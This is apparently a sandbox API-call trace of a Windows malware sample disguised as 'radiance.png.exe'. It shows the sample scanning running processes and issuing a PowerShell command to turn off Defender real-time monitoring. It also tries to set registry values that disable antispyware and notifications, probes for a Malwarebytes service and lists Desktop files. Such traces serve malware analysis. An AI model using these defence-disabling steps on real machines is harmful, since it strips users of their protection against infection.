	[0046.444] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0046.446] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCui.exe") returned 1
	[0046.446] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.447] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1
	[0046.447] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0046.448] lstrcmpiW (lpString1="WmiPrvSE.exe", lpString2="MSASCui.exe") returned 1
	[0046.448] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0046.449] lstrcmpiW (lpString1="sppsvc.exe", lpString2="MSASCui.exe") returned 1
	[0046.450] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0046.451] lstrcmpiW (lpString1="dwm.exe", lpString2="MSASCui.exe") returned -1
	[0046.451] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.452] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1
	[0046.452] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0046.453] lstrcmpiW (lpString1="explorer.exe", lpString2="MSASCui.exe") returned -1
	[0046.453] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0046.455] lstrcmpiW (lpString1="audiodg.exe", lpString2="MSASCui.exe") returned -1
	[0046.455] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0046.456] lstrcmpiW (lpString1="WmiPrvSE.exe", lpString2="MSASCui.exe") returned 1
	[0046.456] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0046.457] lstrcmpiW (lpString1="shirts_cumshots_compaq.exe", lpString2="MSASCui.exe") returned 1
	[0046.457] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0046.458] lstrcmpiW (lpString1="league.exe", lpString2="MSASCui.exe") returned -1
	[0046.458] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0046.460] lstrcmpiW (lpString1="js_sound.exe", lpString2="MSASCui.exe") returned -1
	[0046.460] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0046.461] lstrcmpiW (lpString1="beast-dry.exe", lpString2="MSASCui.exe") returned -1
	[0046.461] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0046.462] lstrcmpiW (lpString1="forecastsgeographic.exe", lpString2="MSASCui.exe") returned -1
	[0046.462] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0046.463] lstrcmpiW (lpString1="reno.exe", lpString2="MSASCui.exe") returned 1
	[0046.463] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0046.465] lstrcmpiW (lpString1="specreformwear.exe", lpString2="MSASCui.exe") returned 1
	[0046.465] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0046.466] lstrcmpiW (lpString1="rr_publications.exe", lpString2="MSASCui.exe") returned 1
	[0046.466] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0046.467] lstrcmpiW (lpString1="solo.exe", lpString2="MSASCui.exe") returned 1
	[0046.467] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0046.468] lstrcmpiW (lpString1="beam.exe", lpString2="MSASCui.exe") returned -1
	[0046.468] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0046.469] lstrcmpiW (lpString1="configurations.exe", lpString2="MSASCui.exe") returned -1
	[0046.469] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0046.470] lstrcmpiW (lpString1="fact-film-anticipated.exe", lpString2="MSASCui.exe") returned -1
	[0046.470] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0046.472] lstrcmpiW (lpString1="wanting villages.exe", lpString2="MSASCui.exe") returned 1
	[0046.472] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0046.473] lstrcmpiW (lpString1="engagementresearchersmonkey.exe", lpString2="MSASCui.exe") returned -1
	[0046.473] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0046.474] lstrcmpiW (lpString1="surgical-marcus.exe", lpString2="MSASCui.exe") returned 1
	[0046.475] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0046.476] lstrcmpiW (lpString1="iexplore.exe", lpString2="MSASCui.exe") returned -1
	[0046.476] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0046.477] lstrcmpiW (lpString1="iexplore.exe", lpString2="MSASCui.exe") returned -1
	[0046.477] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="radiance.png.exe")) returned 1
	[0046.478] lstrcmpiW (lpString1="radiance.png.exe", lpString2="MSASCui.exe") returned 1
	[0046.478] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd50, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0046.479] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCui.exe") returned -1
	[0046.479] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0046.480] lstrcmpiW (lpString1="conhost.exe", lpString2="MSASCui.exe") returned -1
	[0046.480] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0
	[0046.481] CloseHandle (hObject=0x1a8) returned 1
	[0046.482] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x12adb8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ada8 | out: lpCommandLine="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessInformation=0x12ada8*(hProcess=0xb0, hThread=0x1a8, dwProcessId=0xeec, dwThreadId=0xef0)) returned 1
	[0046.489] GetProcessHeap () returned 0x170000
	[0046.489] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x26) returned 0x1c8a10
	[0046.489] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", ulOptions=0x0, samDesired=0x102, phkResult=0x12ae00 | out: phkResult=0x12ae00*=0x0) returned 0x2
	[0046.489] RegSetValueExW (hKey=0x0, lpValueName="DisableAntiSpyware", Reserved=0x0, dwType=0x4, lpData=0x12adfc, cbData=0x4) returned 0x6
	[0046.489] RegCloseKey (hKey=0x0) returned 0x6
	[0046.489] GetProcessHeap () returned 0x170000
	[0046.489] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x2a) returned 0x187828
	[0046.489] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications", ulOptions=0x0, samDesired=0x102, phkResult=0x12ae00 | out: phkResult=0x12ae00*=0x0) returned 0x2
	[0046.490] RegSetValueExW (hKey=0x0, lpValueName="DisableNotifications", Reserved=0x0, dwType=0x4, lpData=0x12adfc, cbData=0x4) returned 0x6
	[0046.490] RegCloseKey (hKey=0x0) returned 0x6
	[0046.490] GetProcessHeap () returned 0x170000
	[0046.490] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x18) returned 0x1b32a0
	[0046.490] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x1b6140
	[0046.490] OpenServiceW (hSCManager=0x1b6140, lpServiceName="MBAMService", dwDesiredAccess=0x4) returned 0x0
	[0046.490] CloseServiceHandle (hSCObject=0x1b6140) returned 1
	[0046.491] GetNativeSystemInfo (in: lpSystemInfo=0x12b018 | out: lpSystemInfo=0x12b018*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0046.491] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12aba4, nSize=0x104 | out: lpFilename="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe" (normalized: "c:\\users\\2xc7u663gxwc\\desktop\\radiance.png.exe")) returned 0x2e
	[0046.491] GetProcessHeap () returned 0x170000
	[0046.491] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x18) returned 0x1b3600
	[0046.491] GetCurrentProcess () returned 0xffffffff
	[0046.491] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12a718 | out: TokenHandle=0x12a718*=0x80) returned 1
	[0046.491] GetTokenInformation (in: TokenHandle=0x80, TokenInformationClass=0x1, TokenInformation=0x12a71c, TokenInformationLength=0x4c, ReturnLength=0x12a704 | out: TokenInformation=0x12a71c, ReturnLength=0x12a704) returned 1
	[0046.491] AllocateAndInitializeSid (in: pIdentifierAuthority=0x12a710, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12a70c | out: pSid=0x12a70c*=0x198e38*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
	[0046.491] EqualSid (pSid1=0x12a724*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), pSid2=0x198e38*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0
	[0046.491] CloseHandle (hObject=0x80) returned 1
	[0046.491] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x12a78c | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming") returned 0x0
	[0046.492] lstrcmpiW (lpString1="C:\\Users\\2XC7u663GxWc\\Desktop\\radianc", lpString2="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming") returned 1
	[0046.492] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop\\*", lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xfa927620, ftLastAccessTime.dwHighDateTime=0x1d50a69, ftLastWriteTime.dwLowDateTime=0xfa927620, ftLastWriteTime.dwHighDateTime=0x1d50a69, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x80, cFileName=".", cAlternateFileName="")) returned 0x1b4c90
	[0046.492] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xfa927620, ftLastAccessTime.dwHighDateTime=0x1d50a69, ftLastWriteTime.dwLowDateTime=0xfa927620, ftLastWriteTime.dwHighDateTime=0x1d50a69, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x80, cFileName="..", cAlternateFileName="")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73faa240, ftCreationTime.dwHighDateTime=0x1d4c66c, ftLastAccessTime.dwLowDateTime=0x72a03590, ftLastAccessTime.dwHighDateTime=0x1d4d5c6, ftLastWriteTime.dwLowDateTime=0x72a03590, ftLastWriteTime.dwHighDateTime=0x1d4d5c6, nFileSizeHigh=0x0, nFileSizeLow=0x16743, dwReserved0=0x0, dwReserved1=0x80, cFileName="-NYd.m4a", cAlternateFileName="")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0450f0, ftCreationTime.dwHighDateTime=0x1d4ca50, ftLastAccessTime.dwLowDateTime=0xb024fd0, ftLastAccessTime.dwHighDateTime=0x1d4d2ed, ftLastWriteTime.dwLowDateTime=0xb024fd0, ftLastWriteTime.dwHighDateTime=0x1d4d2ed, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x80, cFileName="12vHFkl0wHQF_j5rnLm.gif", cAlternateFileName="12VHFK~1.GIF")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55766dc0, ftCreationTime.dwHighDateTime=0x1d4d30c, ftLastAccessTime.dwLowDateTime=0x61b89b10, ftLastAccessTime.dwHighDateTime=0x1d4c972, ftLastWriteTime.dwLowDateTime=0x61b89b10, ftLastWriteTime.dwHighDateTime=0x1d4c972, nFileSizeHigh=0x0, nFileSizeLow=0x7af, dwReserved0=0x0, dwReserved1=0x80, cFileName="3QOuRGsze.mp3", cAlternateFileName="3QOURG~1.MP3")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc797aa90, ftCreationTime.dwHighDateTime=0x1d4cb1e, ftLastAccessTime.dwLowDateTime=0x7ebb6d60, ftLastAccessTime.dwHighDateTime=0x1d4c75f, ftLastWriteTime.dwLowDateTime=0x7ebb6d60, ftLastWriteTime.dwHighDateTime=0x1d4c75f, nFileSizeHigh=0x0, nFileSizeLow=0x80c8, dwReserved0=0x0, dwReserved1=0x80, cFileName="3t8pld-ct pTuLbjAY.swf", cAlternateFileName="3T8PLD~1.SWF")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeac1e6a0, ftCreationTime.dwHighDateTime=0x1d4c6c5, ftLastAccessTime.dwLowDateTime=0x1ba693d0, ftLastAccessTime.dwHighDateTime=0x1d4cdea, ftLastWriteTime.dwLowDateTime=0x1ba693d0, ftLastWriteTime.dwHighDateTime=0x1d4cdea, nFileSizeHigh=0x0, nFileSizeLow=0xbe09, dwReserved0=0x0, dwReserved1=0x80, cFileName="4f8Gj4x1sL.pdf", cAlternateFileName="4F8GJ4~1.PDF")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc28ac4d0, ftCreationTime.dwHighDateTime=0x1d4c8bf, ftLastAccessTime.dwLowDateTime=0xd5e52340, ftLastAccessTime.dwHighDateTime=0x1d4d111, ftLastWriteTime.dwLowDateTime=0xd5e52340, ftLastWriteTime.dwHighDateTime=0x1d4d111, nFileSizeHigh=0x0, nFileSizeLow=0x6e79, dwReserved0=0x0, dwReserved1=0x80, cFileName="6H0PVarG Xrc AMu_RkQ.m4a", cAlternateFileName="6H0PVA~1.M4A")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd484a1f0, ftCreationTime.dwHighDateTime=0x1d4d57c, ftLastAccessTime.dwLowDateTime=0x8114ec30, ftLastAccessTime.dwHighDateTime=0x1d4d330, ftLastWriteTime.dwLowDateTime=0x8114ec30, ftLastWriteTime.dwHighDateTime=0x1d4d330, nFileSizeHigh=0x0, nFileSizeLow=0x15536, dwReserved0=0x0, dwReserved1=0x80, cFileName="bAz9X3C3oB3TKBh9xU.gif", cAlternateFileName="BAZ9X3~1.GIF")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc2ed660, ftCreationTime.dwHighDateTime=0x1d4c958, ftLastAccessTime.dwLowDateTime=0x5dc3dcd0, ftLastAccessTime.dwHighDateTime=0x1d4cc89, ftLastWriteTime.dwLowDateTime=0x5dc3dcd0, ftLastWriteTime.dwHighDateTime=0x1d4cc89, nFileSizeHigh=0x0, nFileSizeLow=0x1125f, dwReserved0=0x0, dwReserved1=0x80, cFileName="EJ07n.bmp", cAlternateFileName="")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94d6c850, ftCreationTime.dwHighDateTime=0x1d4cd87, ftLastAccessTime.dwLowDateTime=0x549eefc0, ftLastAccessTime.dwHighDateTime=0x1d4cdf9, ftLastWriteTime.dwLowDateTime=0x549eefc0, ftLastWriteTime.dwHighDateTime=0x1d4cdf9, nFileSizeHigh=0x0, nFileSizeLow=0x16004, dwReserved0=0x0, dwReserved1=0x80, cFileName="E_STyM9.wav", cAlternateFileName="")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b9348b0, ftCreationTime.dwHighDateTime=0x1d4d44d, ftLastAccessTime.dwLowDateTime=0x5be143b0, ftLastAccessTime.dwHighDateTime=0x1d4d3e8, ftLastWriteTime.dwLowDateTime=0x5be143b0, ftLastWriteTime.dwHighDateTime=0x1d4d3e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f09, dwReserved0=0x0, dwReserved1=0x80, cFileName="fAgWhbpNPzrZVDZXiwEY.xlsx", cAlternateFileName="FAGWHB~1.XLS")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2057500, ftCreationTime.dwHighDateTime=0x1d4cd8a, ftLastAccessTime.dwLowDateTime=0x71787ba0, ftLastAccessTime.dwHighDateTime=0x1d4d39b, ftLastWriteTime.dwLowDateTime=0x71787ba0, ftLastWriteTime.dwHighDateTime=0x1d4d39b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x80, cFileName="JMhehtCilQXRONo0P", cAlternateFileName="JMHEHT~1")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1ffc470, ftCreationTime.dwHighDateTime=0x1d4d35c, ftLastAccessTime.dwLowDateTime=0xd13c8c30, ftLastAccessTime.dwHighDateTime=0x1d4d516, ftLastWriteTime.dwLowDateTime=0xd13c8c30, ftLastWriteTime.dwHighDateTime=0x1d4d516, nFileSizeHigh=0x0, nFileSizeLow=0x7a4d, dwReserved0=0x0, dwReserved1=0x80, cFileName="KPIDgVgdJKY.flv", cAlternateFileName="KPIDGV~1.FLV")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcabc4d80, ftCreationTime.dwHighDateTime=0x1d4d4be, ftLastAccessTime.dwLowDateTime=0xe305f40, ftLastAccessTime.dwHighDateTime=0x1d4c6ad, ftLastWriteTime.dwLowDateTime=0xe305f40, ftLastWriteTime.dwHighDateTime=0x1d4c6ad, nFileSizeHigh=0x0, nFileSizeLow=0x3e49, dwReserved0=0x0, dwReserved1=0x80, cFileName="KSFOkn2qqg4R.png", cAlternateFileName="KSFOKN~1.PNG")) returned 1
